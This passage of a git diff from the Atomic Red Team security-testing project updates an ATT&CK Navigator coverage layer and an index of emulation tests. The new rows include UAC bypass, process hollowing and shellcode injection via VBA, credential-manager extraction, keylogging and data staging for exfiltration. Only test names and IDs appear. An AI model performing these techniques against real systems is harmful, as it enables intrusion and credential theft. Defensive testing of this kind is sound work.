nabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219",
"score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":tru
e},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"tech
niqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1
037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"ena
bled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":10
0,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219",
"score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":tru
e},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqu
eID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 7ae3b587..c6f0fcb8 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -10,14 +10,14 @@ privilege-escalation,T1546.011,Application Shimming,3,Registry key creation and/
privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
-privilege-escalation,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
-privilege-escalation,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
-privilege-escalation,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
-privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
-privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
-privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
-privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
-privilege-escalation,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -49,7 +49,9 @@ privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of
privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
+privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
+privilege-escalation,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
privilege-escalation,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
@@ -63,6 +65,7 @@ privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fe
privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
+privilege-escalation,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
@@ -156,6 +159,7 @@ persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db
persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
+persistence,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
@@ -182,6 +186,7 @@ credential-access,T1552.001,Credentials In Files,1,Extract Browser and System cr
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
+credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
@@ -228,20 +233,51 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr
credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
+collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
+collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
+collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
+collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
+collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
+collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
+collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
+collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
+collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
+collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
+collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
+collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
+collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
+collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
+collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
+collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
+collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
+collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
+collection,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
+collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
+collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
+collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
+collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
